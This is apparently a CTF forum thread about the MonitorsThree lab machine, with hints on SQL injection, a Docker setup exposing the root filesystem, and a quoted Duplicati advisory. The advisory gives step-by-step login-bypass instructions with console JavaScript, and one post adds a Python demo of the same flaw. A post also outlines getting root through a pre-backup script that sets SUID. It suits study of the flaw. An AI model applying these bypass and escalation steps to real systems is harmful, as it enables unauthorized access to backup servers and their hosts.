Let’s talk about MonitorsThree. Please do not share a write-up or flag here.
Hex
August 24, 2024, 6:27pm
2
let’s go, last 30 minutes
Hex
August 24, 2024, 7:27pm
3
Trying to bypass login page with the valid username admin
Hex
August 24, 2024, 8:03pm
4
Somebody gotta learn how to prevent SQLi
Hex
August 24, 2024, 10:49pm
6
Privilege escalation was fun. Check these out:
marcus@monitorsthree:/opt$ cat docker-compose.yml
```yaml
version: "3"
services:
  duplicati:
    image: lscr.io/linuxserver/duplicati:latest
    container_name: duplicati
    environment:
      - PUID=0
      - PGID=0
      - TZ=Etc/UTC
    volumes:
      - /opt/duplicati/config:/config
      - /:/source
    ports:
      - 127.0.0.1:8200:8200
    restart: unless-stopped
```
opened 03:20PM - 18 May 24 UTC
closed 02:32PM - 12 Aug 24 UTC
- [x] I have searched open and closed issues for duplicates.
- [x] I have searched the [forum](https://forum.duplicati.com) for related topics.
----------------------------------------
## Environment info
- **Duplicati version**: <= 2.0.7
- **Operating system**: Linux
- **Backend**: Local
## Description
When Duplicati is configured with a login password, it is possible to bypass the login authentication using the Database server passphrase without actually knowing the correct password. The issue lies in the way the server passphrase is used to generate the authentication token.
https://github.com/duplicati/duplicati/blob/67c1213a98e9f98659f3d4b78ded82b80ddab8bb/Duplicati/Server/webroot/login/login.js
```javascript
$.ajax({
    url: './login.cgi',
    type: 'POST',
    dataType: 'json',
    data: {'get-nonce': 1}
})
.done(function(data) {
    var saltedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Utf8.parse($('#login-password').val()) + CryptoJS.enc.Base64.parse(data.Salt)));
    var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse(data.Nonce) + saltedpwd)).toString(CryptoJS.enc.Base64);
    $.ajax({
        url: './login.cgi',
        type: 'POST',
        dataType: 'json',
        data: {'password': noncedpwd }
    })
```
First saltedpwd is the SHA256 hash of the plaintext password entered by the user concatenated with the salt. Then noncedpwd is the SHA256 hash of the nonce concatenated with saltedpwd, which is then sent as the password parameter to login.cgi.
## Steps to reproduce
1. Set up Duplicati with a login password
2. Open Duplicati DB using any tool (like sqlite)
3. Grab the (Server_passphrase)
4. Open Burp Suite and enable "Intercept".
5. Go to the Duplicati login page and enter any password.
6. Intercept the request in Burp Suite and select "Do intercept > Response to this request".
7. Analyze the intercepted response to retrieve the Nonce and Salt values.
8. Verify that the Salt matches the one from the Duplicati database and note that the Nonce changes with each request.
9. Convert the server passphrase from Base64 to Hex.
10. Open the browser console (Chrome/Firefox), type "allow pasting", and run the following modified command:
```javascript
var saltedpwd = 'HexOutputFromCyberChef'; // Replace with the Hex output from step 6
var noncedpwd = CryptoJS.SHA256(CryptoJS.enc.Hex.parse(CryptoJS.enc.Base64.parse('NonceFromBurp') + saltedpwd)).toString(CryptoJS.enc.Base64); // Replace 'NonceFromBurp' with the intercepted nonce
console.log(noncedpwd);
```
11. Copy the noncedpwd value returned by the console.
12. In Burp Suite, forward the intercepted request and modify the password parameter with the noncedpwd value, URL encoding it if necessary (use CTRL+U in Burp Suite to URL encode).
13. Forward the request and observe that you are logged into the Duplicati web interface.
- **Actual result**:
Successfully logs into the Duplicati web interface without needing the login password, using the server passphrase.
- **Expected result**:
The server passphrase should not bypass the login authentication. Only the correct login password should grant access to the web interface.
## Screenshots
N/A
## Debug log
N/A
https://medium.com/@STarXT/duplicati-bypassing-login-authentication-with-server-passphrase-024d6991e9ee
And you’ve got to find a way to escalate to root after bypassing Duplicati.
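As an added illustration (my own Python, not code from the issue, Duplicati, or anyone in this thread): the login.js derivation quoted above, re-implemented so you can check that the server only ever needs the stored salted digest, which is what makes the database value a password-equivalent secret. The password, salt and nonce are constructed sample values, and the assumption that the server verifies by recomputing the same SHA-256 over nonce and stored digest is drawn from the issue's description rather than from Duplicati's server code.

```python
import base64
import hashlib
import hmac

# Constructed sample values for the demo; a real deployment has its own.
SAMPLE_PASSWORD = "correct horse battery staple"
SAMPLE_SALT = bytes(range(32))                       # 32-byte salt from the DB
SAMPLE_NONCE = bytes.fromhex("00112233445566778899aabbccddeeff" * 2)  # per-login nonce


def salted_password(password: str, salt: bytes) -> bytes:
    """saltedpwd in login.js: SHA-256(utf8(password) || salt).

    This digest is what the server stores as its passphrase, so reading it
    from the database is as good as knowing the password.
    """
    return hashlib.sha256(password.encode("utf-8") + salt).digest()


def token_from_salted(salted: bytes, nonce: bytes) -> str:
    """noncedpwd in login.js: Base64(SHA-256(nonce || saltedpwd)).

    Only the stored digest and the public nonce go in; no password needed.
    """
    return base64.b64encode(hashlib.sha256(nonce + salted).digest()).decode("ascii")


def token_from_password(password: str, salt: bytes, nonce: bytes) -> str:
    """What the unmodified login page computes from the typed password."""
    return token_from_salted(salted_password(password, salt), nonce)


def server_accepts(stored_salted: bytes, nonce: bytes, presented: str) -> bool:
    """Assumed server check: recompute the token from the stored digest.

    The server cannot tell whether the client started from the password or
    from the digest itself, which is the design flaw the issue describes.
    """
    expected = token_from_salted(stored_salted, nonce)
    return hmac.compare_digest(expected, presented)


def stored_value_is_password_equivalent(password: str, salt: bytes, nonce: bytes) -> bool:
    """True when a token built from the stored digest alone is accepted."""
    stored = salted_password(password, salt)   # what sits in the DB
    forged = token_from_salted(stored, nonce)  # the password is never used here
    return server_accepts(stored, nonce, forged)


if __name__ == "__main__":
    print("stored digest is password-equivalent:",
          stored_value_is_password_equivalent(SAMPLE_PASSWORD, SAMPLE_SALT, SAMPLE_NONCE))
```

The defender's takeaway is that the database file holding the passphrase deserves the same protection as the password itself, since any read access to it grants web-interface access.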
Hex
August 24, 2024, 10:49pm
7
DM me if you need more help
Hex
August 25, 2024, 3:41pm
8
Bypass the login page. For root access, configure a script to run before backups and include your SUID script method in it. Then, trigger the backup process.
Hex
September 13, 2024, 2:21pm
10
Hey, click on my name and then click on the chat or message button and submit your message.
1 Like
laithay
September 23, 2024, 8:43am
11
Hello, I got a reverse shell on this but I couldn’t get the key for the Marcus user. Can I get some help?